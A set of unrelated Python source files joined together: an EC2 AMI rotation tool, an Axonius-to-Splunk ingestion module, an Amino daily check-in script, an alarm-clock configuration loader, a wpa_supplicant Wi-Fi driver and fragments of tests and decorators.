self.assertEqual(key, convert("0055401502"))
key = create_key([0.92, 0.12001, 0.11223], 10)
self.assertEqual(key, convert("1116763170"))
key = create_key([0.92, 0.12001, 0.11223], 2)
self.assertEqual(key, convert("11"))
def test_createKey5dims(self):
for size in [0, 2, 3, 10, 17]:
key = create_key([random.random() for i in range(5)], size)
self.assertEqual(len(key), size)
def test_create_element_rand(self):
long_value = (1039935063 << 32) + 24434444
self.assertEqual(long_value, 4466487085573134092)
rand = create_element_rand(struct.pack('q', long_value))
self.assertEqual(rand, 411538470)
rand = create_element_rand(long_value)
self.assertEqual(rand, 411538470)
if __name__ == '__main__':
unittest.main()
def convert(key):
return "".join(map(lambda c: chr(int(c) + consts.PRINTABLE_OFFSET), key))
|
#!/usr/bin/env python
#
# Modules Import
#
import argparse
import boto3
import json
import os
import requests
import sys
import time
from operator import itemgetter
#
# Variables Definition
#
instance_id_metadata_url = 'http://169.254.169.254/latest/meta-data/instance-id'
#
# Function to parse the input arguments and build the help message
#
def arguments_parser():
parser = argparse.ArgumentParser(
description='Tool to create and rotate EC2 AMIs and associated snapshots',
add_help=True
)
options = parser.add_argument_group('Options')
options.add_argument(
'-n', '--name',
type=str,
action='store',
dest='ami_name',
required=True,
help='Name for the AMI to create or rotate'
)
options.add_argument(
'-t', '--time',
action='store_true',
dest='time',
help='Add the time to the name format: AMI_NAME-AAAA_MM_DD-HH_MM (default: AMI_NAME-AAAA_MM_DD)'
)
options.add_argument(
'-d', '--description',
type=str,
action='store',
dest='ami_description',
default='TBD',
help='Description for the AMI to create (default: AMI_NAME AMI created by ' + os.path.basename(sys.argv[0]) + ')'
)
options.add_argument(
'-i', '--instance-id',
type=str,
action='store',
dest='instance_id',
default='TBD',
help='Instance ID from which create the AMI (default: Self Instance ID)'
)
options.add_argument(
'-r', '--reboot',
action='store_true',
dest='reboot',
help='Reboot the instance to create the AMI (default: No reboot)'
)
options.add_argument(
'-b', '--block-device-mappings',
type=str,
action='store',
dest='block_device_list_json',
default='TBD',
help='JSON format list of one or more block device mappings to include in the AMI (default: Include all block device mappings attached to the instance)'
)
options.add_argument(
'-c', '--rotation-copies',
type=int,
action='store',
dest='copies_number',
default=10,
help='Number of copies for rotation (default: 10)'
)
options.add_argument(
'-p', '--profile',
type=str,
action='store',
dest='profile',
default='default',
help='Use a specific profile from AWS CLI stored configurations'
)
commands = parser.add_argument_group('Actions')
commands.add_argument(
'command',
type=str,
choices=['create', 'rotate'],
help='Command to execute'
)
args = parser.parse_args()
return args
#
# Function to print the boto3 responses in JSON format
#
def json_response(response):
return json.dumps(
response,
default=str,
sort_keys=True,
indent=4,
separators=(',', ': ')
)
#
# Function to create a session of boto3 to interact with the AWS account
#
def create_session():
profile = arguments.profile
if (profile != 'default') and (not profile in boto3.session.Session().available_profiles):
print("\nThe '" + profile + "' profile does not exist!\n")
elif (profile == 'default') and (boto3.session.Session().get_credentials() is None):
print("\nThere is no AWS CLI configuration defined!\n")
elif profile != 'default':
return boto3.session.Session(profile_name=profile)
else:
return boto3.session.Session()
print("Please provide AWS configuration, e.g. via the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_DEFAULT_REGION environment variables\n")
exit(-1)
#
# Function to deregister an AMI and delete its associated snapshots
#
# Input argument => ami_info : Dictionary that contains the AMI attributes
#
def deregister_ami(ami_info):
# Deregister the AMI
image_id = str(ami_info['ImageId'])
print("\nDeregister '" + image_id + "' AMI with '" + ami_info['Name'] + "' name:")
response = ec2.deregister_image(ImageId=image_id)
print(json_response(response))
# Delete the associated snapshots
for device in ami_info['BlockDeviceMappings']:
# If device is an EBS volume, it proceeds to delete the associated snapshot
if 'Ebs' in device:
snapshot_id = str(device['Ebs']['SnapshotId'])
print("\nDelete '" + snapshot_id + "' associated snapshot:")
response = ec2.delete_snapshot(SnapshotId=snapshot_id)
print(json_response(response))
#
# Main
#
# Parse input arguments
arguments = arguments_parser()
session = create_session()
ec2 = session.client('ec2')
# If the specified action is 'create', the following block is executed
if (arguments.command == 'create'):
# Definition of required parameters to create AMIs
if arguments.time:
actual_date = time.strftime('%Y_%m_%d-%H_%M')
else:
actual_date = time.strftime('%Y_%m_%d')
ami_name = arguments.ami_name + '-' + actual_date
if (not arguments.ami_description) or (arguments.ami_description == 'TBD'):
ami_description = arguments.ami_name + ' AMI created by ' + os.path.basename(sys.argv[0])
else:
ami_description = arguments.ami_description
if (not arguments.instance_id) or (arguments.instance_id == 'TBD'):
try:
instance_id = str(requests.get(instance_id_metadata_url, timeout=3).text)
except requests.exceptions.RequestException as err:
print("\nThis is not an EC2 instance, so --instance_id option must be specified\n")
os.system(__file__ + ' --help')
exit(1)
else:
instance_id = arguments.instance_id
if (not arguments.block_device_list_json) or (arguments.block_device_list_json == 'TBD'):
block_device_list_json = None
else:
block_device_list_json = json.loads(arguments.block_device_list_json)
# Check if there is already an AMI created with ami_name name
response = ec2.describe_images(
Filters=[{
'Name': 'name',
'Values': [ami_name]
}],
Owners=['self']
)
# If there is already an AMI created with ami_name name, it proceeds to deregister in order to create it again
if (response['Images']) and (response['Images'][0]['Name'] == ami_name):
print("\nAn AMI with '" + ami_name + "' name already exists. This AMI will be deregistered before creating the new one...")
deregister_ami(response['Images'][0])
print("\nCreate '" + ami_name + "' AMI with '" + ami_description + "' description from '" + instance_id + "' instance:")
if block_device_list_json is None:
if arguments.reboot:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description
)
else:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
NoReboot=True
)
else:
if arguments.reboot:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
BlockDeviceMappings=block_device_list_json
)
else:
response = ec2.create_image(
InstanceId=instance_id,
Name=ami_name,
Description=ami_description,
BlockDeviceMappings=block_device_list_json,
NoReboot=True
)
print(json_response(response))
# If the specified action is 'rotate', the following block is executed
if (arguments.command == 'rotate'):
# Definition of required parameters to rotate AMIs
if arguments.time:
filter_date = '????_??_??-??_??'
else:
filter_date = '????_??_??'
filter_name = arguments.ami_name + '-' + filter_date
rotation_copies = arguments.copies_number
# Get the list of registered AMIs which name match the filter_name pattern
response = ec2.describe_images(
Filters=[{
'Name': 'name',
'Values': [filter_name]
}],
Owners=['self']
)
# Sort the AMIs list by the 'Name' attribute
sorted_images = sorted(response['Images'], key=itemgetter('Name'), reverse=True)
print("\nAMIs currently registered:\n")
for ami in sorted_images:
print("\t" + ami['Name'])
if (len(sorted_images) > rotation_copies):
if (len(sorted_images) - rotation_copies) == 1:
print("\nThere is " + str(len(sorted_images) - rotation_copies) + " AMI to deregister...")
else:
print("\nThere are " + str(len(sorted_images) - rotation_copies) + " AMIs to deregister...")
try:
# Python 2 forward compatibility
range = xrange
except NameError:
pass
for i in range(rotation_copies, len(sorted_images)):
deregister_ami(sorted_images[i])
else:
print("\nThe number of registered AMIs with '" + filter_name + "' name pattern is less or equal than the rotation copies number. No need to deregister any AMIs\n")
|
from .models import Session
from .utils import Utilities
from mongoengine import DoesNotExist
def check_args(required_args: list[str], optional_args: list[str], types: dict[str, tuple[type]]):
def decorator(func):
def wrapper(*_, **args):
for arg in required_args:
if arg not in args or not isinstance(args[arg], types[arg]):
return Utilities.make_reponse(400, 'Invalid parameters')
for arg in args:
if (arg not in optional_args and arg not in required_args) or not isinstance(args[arg], types[arg]):
return Utilities.make_reponse(400, 'Invalid parameters')
return func(*_, **args)
return wrapper
return decorator
def check_token(is_auth=False):
def decorator(func):
def wrapper(*args, **kwargs):
try:
session = Session.objects.get(token=kwargs['token'])
if is_auth and not session.is_auth:
return Utilities.make_reponse(403, 'Session is not authorized')
except DoesNotExist:
return Utilities.make_reponse(404, 'Session not found')
return func(*args, **kwargs)
return wrapper
return decorator
|
# encoding = utf-8
import datetime
import json
import os
import re
import requests
import sys
import time
class Config:
supported_minimum_version: str = "4.4.0"
retry_standoff: list = [0, 5, 10, 15, 30, 60]
request_timeout: int = 900
class API:
def __init__(self, url, api_key, api_secret, verify=False, timeout=900):
self._url = url
self._api_key = api_key
self._api_secret = api_secret
self._verify = verify
self._timeout = timeout
def _rest_base(self, method, api_endpoint, data=None, params=None, headers={}):
requests_method = getattr(requests, method)
response = None
exception = None
req = None
try:
headers['api-key'] = self._api_key
headers['api-secret'] = self._api_secret
if True == self._verify:
req = requests_method(f"{self._url}{api_endpoint}", timeout=self._timeout, params=params, data=json.dumps(data), headers=headers)
else:
req = requests_method(f"{self._url}{api_endpoint}", timeout=self._timeout, params=params, data=json.dumps(data), headers=headers, verify=self._verify)
except Exception as e:
exception = e
req_status_code = None
if req is not None:
req_status_code = req.status_code
req_json = {"data": ""}
if req is not None:
req_json = req.json()
return (req_status_code, req_json, exception)
def get(self, api_endpoint, data=None, params=None, headers={}):
return self._rest_base("get", api_endpoint, data=data, params=params, headers=headers)
def post(self, api_endpoint, data=None, params=None, headers={}):
return self._rest_base("post", api_endpoint, data=data, params=params, headers=headers)
class Metadata:
def __init__(self, api):
self._api = api
self._api_endpoint = "/api/settings/metadata"
def get_version(self):
status, response, exception = self._api.get(self._api_endpoint)
if status == 200 and response is not None and exception is None:
return response["Installed Version"]
else:
raise Exception(f"Critical Error! Status Code: '{status}' Exception: '{exception}'")
class SavedQueries:
def __init__(self, api, base_api_endpoint):
self._api = api
self._api_endpoint = base_api_endpoint
self._queries = {}
def get_attributes_by_name(self, query_name):
uuid = None
if False == bool(self._queries):
status, response, exception = self._api.get(f"{self._api_endpoint}/views/saved")
if exception is not None:
raise Exception(exception)
for query in response["data"]:
self._queries[query["attributes"]["name"]] = query["attributes"]["uuid"]
if query_name in self._queries.keys():
uuid = self._queries[query_name]
if uuid is not None:
for query in response["data"]:
if query["attributes"]["uuid"] == uuid:
query_filter = query["attributes"]["view"]["query"]["filter"]
query_fields = query["attributes"]["view"]["fields"]
else:
raise Exception(f"Critical error: The saved query '{query_name}' does not exist")
return (uuid, query_filter, query_fields)
class EntitySearch:
def __init__(self, api, entity_type, page_size=1000, logger_callback=None):
if entity_type not in ["devices", "users"]:
raise Exception(f"{entity} is not a valid entity type")
self._api = api
self._api_endpoint = f"/api/{entity_type}"
self._page_size = page_size
self._cursor = None
self._logger_callback = logger_callback
self._uuid = None
self._query_filter = None
self._query_fields = None
def _log(self, msg):
if self._logger_callback is not None:
self._logger_callback(msg)
def get(self):
response = { "data": "init" }
entities = []
offset = 0
cursor = None
while response["data"]:
data = {
"data": {
"type": "entity_request_schema",
"attributes": {
"page": {
"offset": offset,
"limit": self._page_size
},
"use_cache_entry": False,
"always_cached_query": False,
"get_metadata": True,
"include_details": True
}
}
}
status, response, exception = self._api.post(self._api_endpoint, data)
if status == 200 and response is not None and exception is None:
for device in response["data"]:
entities.append(device["attributes"])
offset += self._page_size
else:
raise Exception(f"Critical Error! Status Code: {status}\tException: {exception}")
return entities
def execute_saved_query(self, name, standoff=0, shorten_field_names=False, dynamic_field_mapping={}, incremental_ingest=False, batch_callback=None):
try:
ax_saved_queries = SavedQueries(self._api, self._api_endpoint)
if self._uuid is None or self._query_filter is None or self._query_fields is None:
self._uuid, self._query_filter, self._query_fields = ax_saved_queries.get_attributes_by_name(name)
if True == incremental_ingest:
if "specific_data.data.fetch_time" not in self._query_fields:
self._query_fields.append("specific_data.data.fetch_time")
response = { "data": "init" }
entities = []
entity_count = 0
while response["data"]:
data = {
"data": {
"type": "entity_request_schema",
"attributes": {
"use_cache_entry": False,
"always_cached_query": False,
"filter": self._query_filter,
"fields": {
"devices": self._query_fields
},
"page": {
"limit": self._page_size
},
"get_metadata": True,
"include_details": True,
"use_cursor": True,
"cursor_id": self._cursor
}
}
}
status, response, exception = self._api.post(self._api_endpoint, data=data)
if status == 200 and response is not None and exception is None:
if "meta" in response:
self._cursor = response["meta"]["cursor"]
for device in response["data"]:
entity_row = {}
for field in data['data']['attributes']['fields']['devices']:
field_name = field
if True == shorten_field_names:
field_name = field.replace("specific_data.data.", "").replace("adapters_data.", "")
if field_name in dynamic_field_mapping.keys():
field_name = dynamic_field_mapping[field_name]
if field in device['attributes']:
entity_row[field_name] = device['attributes'][field]
else:
entity_row[field_name] = device['attributes'][f"{field}_details"]
entities.append(entity_row)
else:
response = { "data": None }
else:
raise Exception(f"Critical Error! Status Code: '{status}' Exception: '{exception}'")
if standoff > 0:
time.sleep(standoff)
if batch_callback is not None:
if len(entities) > 0:
batch_callback(entities)
entity_count += len(entities)
entities = []
except Exception as ex:
raise Exception(f"Critical Error! Status Code: Exception: {ex}")
class EventWriter:
def __init__(self, incremental_data_ingest=False, remove_fetch_time_field=False, checkpoint=None, host=None, source=None, index=None, sourcetype=None, helper=None, event_writer=None):
self._incremental_data_ingest = incremental_data_ingest
self._remove_fetch_time_field = remove_fetch_time_field
self._checkpoint = checkpoint
self._host = host
self._source = source
self._index = index
self._sourcetype = sourcetype
self._helper = helper
self._event_writer = event_writer
self._entity_count = 0
self._page = 0
self._events_written = 0
def process_batch(self, entities):
# Update entity count
self._entity_count += len(entities)
# Increment page number
self._page += 1
# Log page number and size
self._helper.log_info(f"STATS - Processing page {self._page}, size {len(entities)}")
# Process each entity
for entity in entities:
if True == self._incremental_data_ingest:
# Create a timestamp from the devices fetch_time field
entity_fetch_time = datetime.datetime.strptime(entity[fetch_time_field_name], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
# Remove the fetch_time field if it was not part of the saved query's query_field definition
if True == self._remove_fetch_time_field:
entity.pop(fetch_time_field_name)
# Create event
event = self._helper.new_event(source=self._source, host=self._host, index=self._index, sourcetype=self._sourcetype, data=json.dumps(entity))
# Add event if no checkpoint is defined yet, or if fetch time is greater than the checkpoint time
if checkpoint is None:
self._event_writer.write_event(event)
self._events_written += 1
elif entity_fetch_time > checkpoint:
self._event_writer.write_event(event)
self._events_written += 1
else:
# Create event
event = self._helper.new_event(source=self._source, host=self._host, index=self._index, sourcetype=self._sourcetype, data=json.dumps(entity))
# Write event
self._event_writer.write_event(event)
self._events_written += 1
def get_entity_count(self):
return self._entity_count
def get_events_written(self):
return self._events_written
def validate_input(helper, definition):
# get Axonius configuration
api_host = definition.parameters.get('api_host', str)
api_key = definition.parameters.get('api_key', "")
api_secret = definition.parameters.get('api_secret', "")
# get selected saved query info
entity_type = definition.parameters.get('entity_type', str)
saved_query = definition.parameters.get('saved_query', str)
# get extra options
page_size = definition.parameters.get('page_size', str)
api_standoff = definition.parameters.get('standoff_ms', str)
ssl_certificate_path = definition.parameters.get('ssl_certificate_path', "")
enforce_ssl_validation = definition.parameters.get('enforce_ssl_validation')
try:
if int(page_size) < 1:
raise ValueError("Page Size must be an integer greater than 0")
if int(api_standoff) < 0:
raise ValueError("API Standoff must be an integer greater or equal to 0")
except Exception as ex:
raise ValueError(ex)
# Create api object
try:
verify = True
helper.log_info(f"enforce_ssl_validation: {enforce_ssl_validation}")
if str(enforce_ssl_validation).lower() not in ["1", "true"]:
verify = False
helper.log_info(f"verify: {verify}")
if ssl_certificate_path is not None:
if len(ssl_certificate_path) > 0:
verify = ssl_certificate_path
api = API(api_host, str(api_key), str(api_secret), verify)
search = EntitySearch(api, "devices", 1000)
out = search.get()
except Exception as ex:
helper.log_info(ex)
if "Could not find a suitable TLS CA certificate bundle" in str(ex):
raise ValueError("Critical Error, check CA Bundle Path exists and the splunk user has proper permissions")
elif "SSLCertVerificationError" in str(ex) or "Could not find a suitable TLS CA certificate bundle" in str(ex):
raise ValueError("The Axonius host fails SSL verification, please review your SSL certificate validation settings")
else:
raise ValueError(f"Critical Error: {ex}")
pass
def collect_events(helper, ew):
checkpoint_name = f"checkpoint_{helper.get_arg('name')}_{helper.get_arg('entity_type')}_{helper.get_arg('saved_query')}"
# get Axonius configuration
opt_api_host = helper.get_arg('api_host')
opt_api_key = helper.get_arg('api_key')
opt_api_secret = helper.get_arg('api_secret')
# get selected saved query info
opt_entity_type = helper.get_arg('entity_type')
opt_saved_query = helper.get_arg('saved_query')
# get extra options
opt_page_size = helper.get_arg('page_size')
opt_shorten_field_names = helper.get_arg('shorten_field_names')
opt_incremental_data_ingest = helper.get_arg('incremental_data_ingest')
opt_standoff_ms = helper.get_arg('standoff_ms')
opt_field_mapping = helper.get_arg('dynamic_field_mapping')
opt_ssl_certificate_path = helper.get_arg('ssl_certificate_path')
opt_enforce_ssl_validation = helper.get_arg('enforce_ssl_validation')
helper.log_info(f"VARS - Axonius Host: {opt_page_size}")
helper.log_info(f"VARS - Entity type: {opt_entity_type}")
helper.log_info(f"VARS - Saved query: {opt_saved_query}")
helper.log_info(f"VARS - Page size: {opt_page_size}")
helper.log_info(f"VARS - Shorten field names: {opt_shorten_field_names}")
helper.log_info(f"VARS - Incremental data ingest: {opt_incremental_data_ingest}")
helper.log_info(f"VARS - API standoff (ms): {opt_standoff_ms}")
helper.log_info(f"VARS - Field Mapping: {opt_field_mapping}")
helper.log_info(f"VARS - Enforce SSL validation: {opt_enforce_ssl_validation}")
helper.log_info(f"VARS - CA bundle path: {opt_ssl_certificate_path}")
critical_error = False
def log_message(msg):
helper.log_info(msg)
# Set verify to True/False
verify = opt_enforce_ssl_validation
# Change the value of verify to the path of the ca_bundle if specified
if opt_ssl_certificate_path:
if len(opt_ssl_certificate_path) > 0:
verify = opt_ssl_certificate_path
# The host field will be used to set the source host in search
host = None
# Pull out just the host information from the Host
match = re.match("(?:https?:\/\/)([0-9A-z-.]+)(?::\d+)?", opt_api_host)
# Only set host if the regex exists, match should never be None.
if match is not None:
host=match.groups()[0]
timeout = Config.request_timeout if helper.get_arg('name') is not None else 5
# Create an API object for REST calls
api = API(opt_api_host, opt_api_key, opt_api_secret, verify, timeout=timeout)
# Create EntitySearch object with entity type and page size
search = EntitySearch(api, opt_entity_type, opt_page_size, log_message)
# Load the input's checkpoint data
checkpoint = helper.get_check_point(checkpoint_name)
if checkpoint is not None:
helper.log_info(f"VARS - Check point: {checkpoint_name}")
# Default dynamic field names to an empty dict in case opt_field_mapping is empty
dynamic_field_names = {}
# Use dynamic mapping if specified
if opt_field_mapping is not None:
if len(opt_field_mapping) > 0:
try:
dynamic_field_names = json.loads(opt_field_mapping)
except Exception as ex:
pass
# Retry variables
exceeded_max_retries = False
exception_thrown = False
max_retries = len(Config.retry_standoff) - 1
entity_count = 0
retries = 0
# Set the fetch_time field name, take into account the use of shorten field name
fetch_time_field_name = "fetch_time" if True == opt_shorten_field_names else "specific_data.data.fetch_time"
event_writer = None
while retries < max_retries and not True == critical_error:
try:
metadata = Metadata(api)
version = metadata.get_version()
# Pull out just the host information from the Host
match = re.match("(\d+\_\d+\_\d+)(?:_RC\d+)", version)
# Only set host if the regex exists, match should never be None.
if match is not None:
version = match.groups()[0].replace("_", ".")
helper.log_info(f"STATS - Version: {version}")
tup_version = tuple(map(int, (version.split("."))))
tup_supported_version = tuple(map(int, (Config.supported_minimum_version.split("."))))
if tup_version < tup_supported_version:
raise Exception("UnsupportedVersion")
# Get definition of query_fields, used to check if the fetch_time field should be removed
api_endpoint = f"/api/{opt_entity_type}"
ax_saved_queries = SavedQueries(api, api_endpoint)
uuid, query_filter, query_fields = ax_saved_queries.get_attributes_by_name(opt_saved_query)
retries = 0
# Default remove fetch time to true
remove_fetch_time_field = True
# Look for fetch_time in the query_fields definition of the specified saved query
if True == opt_shorten_field_names:
if fetch_time_field_name in query_fields:
remove_fetch_time_field = False
# Create EventWriter instance to process batches
if event_writer is None:
event_writer = EventWriter(incremental_data_ingest=opt_incremental_data_ingest, remove_fetch_time_field=remove_fetch_time_field, checkpoint=checkpoint, host=host, source=opt_saved_query, index=helper.get_output_index(), sourcetype=helper.get_sourcetype(), helper=helper, event_writer=ew)
# Grab entity from the saved search
search.execute_saved_query(opt_saved_query, int(opt_standoff_ms)/1000, opt_shorten_field_names, dynamic_field_names, incremental_ingest=opt_incremental_data_ingest, batch_callback=event_writer.process_batch)
# Get Stats
entity_count = event_writer.get_entity_count()
events_written = event_writer.get_events_written()
# Log stats
helper.log_info(f"STATS - Total entities returned: {entity_count}")
helper.log_info(f"STATS - Total events written: {events_written}")
except Exception as ex:
if "UnsupportedVersion" in str(ex):
critical_error = True
else:
helper.log_error(f"ERR - Error '{ex}', attempting to recover")
exception_thrown = True
if True == critical_error:
helper.log_critical(f"Input '{helper.get_arg('name')}' Critical Error: Axonius version {version} is unsupported, the minimum version is {Config.supported_minimum_version}")
elif True == exception_thrown:
# Increment retry counter
if True == exception_thrown:
# Log retry
if retries > 0 and False == exceeded_max_retries:
helper.log_info(f"COLL - Retry: {retries}")
retries += 1
if retries < max_retries:
# Log length of retry sleep time
helper.log_info(f"COLL - Sleeping for {Config.retry_standoff[retries]} seconds, then retrying")
# Sleep the process and then retry
time.sleep(Config.retry_standoff[retries])
else:
exceeded_max_retries = True
# Log no devices after max retries
helper.log_critical(f"Input '{helper.get_arg('name')}' Critical Error: No entities returned afetr max retries ({max_retries}), check the saved query '{opt_saved_query}' in the Axonius web console to validate entity count.")
else:
# Save new checkpoint if entity_count is greater than one
if entity_count > 0:
helper.save_check_point(checkpoint_name, datetime.datetime.now().timestamp())
|
#!/usr/bin/env python3
import amino
import os
import getpass
os.system('clear')
print( '\033[1;31m /$$ /$$ ')
print( '\033[1;31m | $$ | $$ ')
print( '\033[1;31m /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$| $$ /$$')
print( '\033[1;31m /$$_____/| $$__ $$ /$$__ $$ /$$_____/| $$ /$$/')
print( '\033[1;31m| $$ | $$ \ $$| $$$$$$$$| $$ | $$$$$$/ ')
print( '\033[1;31m| $$ | $$ | $$| $$_____/| $$ | $$_ $$ ')
print( '\033[1;31m| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$| $$ \ $$')
print( '\033[1;31m \_______/|__/ |__/ \_______/ \_______/|__/ \__/')
print( '\033[1;31m /$$ ')
print( '\033[1;31m |__/ ')
print( '\033[92m /$$ /$$$$$$$ ')
print( '\033[92m /$$$$$$| $$| $$__ $$')
print( '\033[92m|______/| $$| $$ \ $$')
print( '\033[92m | $$| $$ | $$')
print( '\033[92m | $$| $$ | $$')
print( '\033[92m |__/|__/ |__/ \033[1;36mscript By \033[1;92mkira_xc')
print('\n\033[0m')
client=amino.Client()
ss=0
sz=25
nuum=0
tst=False
while tst==False:
try:
email=input("\033[1;93m# your email : \033[0m")
password=getpass.getpass("\033[1;93m# your password : \033[0m")
client.login(email=email,password=password)
tst=True
except:
tst=False
print("\033[1;93m# verify email or password\033[0m")
exx=input("\033[1;93m# to be continue ?\033[1;92m y/n \033[0m: \033[0m")
if exx=='n' or exx=='N' or exx=='no':
os._exit(1)
listcom=client.sub_clients(start=ss,size=sz)
print("\033[1;93m# comminuty lengh : ",len(listcom.comId))
while len(listcom.comId)!=0:
for comId in listcom.comId:
sub_client=amino.SubClient(comId=comId,profile=client.profile)
try:
sub_client.check_in('0')
info=sub_client.get_community_info(comId=comId)
nuum=nuum+1
print(nuum,"\033[1;93m)\033[1;92mcheck in : ok \ncomminuty name :",info.name,"\ncomnunity id : ",comId,"\033[0m")
except:
ttff=True
ss=ss+25
listcom=client.sub_clients(start=ss,size=sz)
print ("\033[1;92mall comminuty is done !\n\033[0m")
os._exit(1)
|
# coding=utf-8
'''
全局数据。包括配置的读取和验证。
对于缺少的配置赋予默认值并暂停警告。
'''
import os.path as spath
import shutil
import logging
from . import mylogging
from sine.utils import EventManager
from .__meta__ import VERSION as version
clocks = []
data = {}
config = {}
timeFormats = []
dateFormats = []
eManager = EventManager(mylogging.getLogger(mylogging.rootPath + '.eManager'))
title = u'闹钟 v' + version
def _init():
import sys
from sine.utils.properties import load, loadSingle, LineReader
from sine.utils import Path
from .initUtil import warn
def boolConverter(s):
'''对空或者0开头的字符串视为False,其余视为True'''
if s == '' or s.startswith('0'):
return False
return True
# 获取代码文件所在目录(保存了默认的配置文件等)
location = Path(__file__).join('..')
data['location'] = location
# 读入配置 ---------------
conf_filename = 'clock.properties'
allMiss = False
try:
useDefault(location, conf_filename)
with open(conf_filename, 'r', encoding='latin') as file:
config.update(load(file))
except Exception as e:
warn(u'从 %s 文件加载配置失败,将会使用默认配置。' % (conf_filename), e)
allMiss = True
# 猜测编码为utf8或gbk(简单对比转换出错率),并解码
utf8_error = 0
for k, v in config.items():
v = v.encode('latin')
try:
v.decode('utf8')
except Exception as e:
utf8_error += 1
gbk_error = 0
for k, v in config.items():
v = v.encode('latin')
try:
v.decode('gbk')
except Exception as e:
gbk_error += 1
# 优先猜测为utf8
if utf8_error <= gbk_error:
encoding = 'utf8'
else:
encoding = 'gbk'
if utf8_error > 0 and gbk_error > 0:
warn(u'无法用UTF-8或GBK解码配置文件 %s ,配置的值会部分丢失且可能有异常。' % (conf_filename))
# 解码
for k, v in config.items():
try:
config[k] = v.encode('latin').decode(encoding)
except Exception as e:
pass
# 为缺失值填充默认配置(键, 默认值, 转换器)
default_config = [
('warning_pause', True, boolConverter),
('sound', True, boolConverter),
('show_msg', True, boolConverter),
('taskbar_flash', True, boolConverter),
('screen_flash_mode', '0111101111', None),
('alarm_last', 30, int),
('alarm_interval', 300, int),
('default_remindAhead', 60, int),
('default_sound', 'default', None),
('format', '%Y-%m-%d %H:%M:%S %%warn %%3idx %%3state %%msg', None),
('flash_format', '%Y-%m-%d %H:%M:%S %%msg', None),
('warn', '!!!', None),
('state.ON', 'ON', None),
('state.OFF', 'OFF', None),
('datafile', 'clocks.csv', None),
('logfile', 'clock.log', None),
('log_format', '%(asctime)s - %(name)s - %(levelname)s - %(message)s', None),
('encoding', 'utf-8', None),
('debug', False, boolConverter),
('debug.no_clear_screen', False, boolConverter),
]
if allMiss:
for (key, default, converter) in default_config:
config[key] = default
else:
for (key, default, converter) in default_config:
if key not in config:
warn(u'找不到设置\'%s\',将会使用默认值\'%s\'。' % (key, str(default)))
config[key] = default
elif converter:
try:
config[key] = converter(config[key])
except Exception as e:
warn(u'读取\'%s=%s\'异常,将会使用默认值\'%s\'。' % (key, str(config[key]), str(default)), e)
config[key] = default
# 从默认值载入或应用状态
data['sound'] = config['sound']
data['show_msg'] = config['show_msg']
mylogging.setDebug(config['debug'])
logger = mylogging.getRoot()
formatter = logging.Formatter(config['log_format'])
handler = logging.FileHandler(config['logfile'])
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
# 读入日期和时间识别格式配置 --------------
format_filename = 'time.properties'
try:
useDefault(location, format_filename)
formats = []
with open(format_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
formats.append((key, value.split(',')))
except Exception as e:
warn(u'从 %s 文件读取时间识别格式出错,将会使用默认格式。' % (format_filename), e)
formats = [( '%M' , ['minute', 'second', 'microsecond']),
('%H:' ,['hour', 'minute', 'second', 'microsecond']),
('%H.' ,['hour', 'minute', 'second', 'microsecond']),
( ':%S', ['second', 'microsecond']),
( '.%S', ['second', 'microsecond']),
('%H:%M' ,['hour', 'minute', 'second', 'microsecond']),
('%H.%M' ,['hour', 'minute', 'second', 'microsecond']),
( ':%M:%S', ['minute', 'second', 'microsecond']),
( '.%M.%S', ['minute', 'second', 'microsecond']),
('%H:%M:%S',['hour', 'minute', 'second', 'microsecond']),
('%H.%M.%S',['hour', 'minute', 'second', 'microsecond'])]
timeFormats.extend(formats)
format_filename = 'date.properties'
try:
useDefault(location, format_filename)
formats = []
with open(format_filename, 'r', encoding='latin') as file:
for line in LineReader(file):
key, value = loadSingle(line)
formats.append((key, value.split(',')))
except Exception as e:
warn(u'从 %s 文件读取日期识别格式出错,将会使用默认格式。' % (format_filename), e)
formats = [( '/%d', ['day']),
( '%m/%d', ['month', 'day']),
('%y/%m/%d',['year', 'month', 'day'])]
dateFormats.extend(formats)
def useDefault(location, filename):
'''配置文件 filename 不存在时从 location 复制默认文件。'''
suffix = '.default'
filepath = filename
if not spath.isfile(filepath):
defaultpath = location.join(filename + suffix)
if spath.isfile(defaultpath):
shutil.copyfile(defaultpath, filepath)
_init()
|
import re
from time import sleep
from wireless.wireless import WirelessDriver, cmd
class WPASupplicantWireless(WirelessDriver):
_file = "/tmp/wpa_supplicant.conf"
_interface = None
# init
def __init__(self, interface=None):
self.interface(interface)
# connect to a network
def connect(self, ssid, password):
# attempt to stop any active wpa_supplicant instances
# ideally we do this just for the interface we care about
cmd("sudo killall wpa_supplicant")
# don't do DHCP for GoPros; can cause dropouts with the server
cmd("sudo ifconfig {} 10.5.5.10/24 up".format(self._interface))
# create configuration file
f = open(self._file, "w")
f.write('network={{\n ssid="{}"\n psk="{}"\n}}\n'.format(ssid, password))
f.close()
# attempt to connect
cmd("sudo wpa_supplicant -i{} -c{} -B".format(self._interface, self._file))
# check that the connection was successful
# i've never seen it take more than 3 seconds for the link to establish
sleep(5)
if self.current() != ssid:
return False
# attempt to grab an IP
# better hope we are connected because the timeout here is really long
# cmd('sudo dhclient {}'.format(self._interface))
# parse response
return True
# returned the ssid of the current network
def current(self):
# get interface status
response = cmd("iwconfig {}".format(self.interface()))
# the current network is on the first line.
# ex: wlan0 IEEE 802.11AC ESSID:"SSID" Nickname:"<WIFI@REALTEK>"
line = response.splitlines()[0]
match = re.search('ESSID:"(.+?)"', line)
if match is not None:
network = match.group(1)
if network != "off/any":
return network
# return none if there was not an active connection
return None
# return a list of wireless adapters
def interfaces(self):
# grab list of interfaces
response = cmd("iwconfig")
# parse response
interfaces = []
for line in response.splitlines():
if len(line) > 0 and not line.startswith(" "):
# this line contains an interface name!
if "no wireless extensions" not in line:
# this is a wireless interface
interfaces.append(line.split()[0])
# return list
return interfaces
# return the current wireless adapter
def interface(self, interface=None):
if interface is not None:
self._interface = interface
else:
return self._interface
# enable/disable wireless networking
def power(self, power=None):
# not supported yet
return None
|
# Copyright 2018 Robert Adams
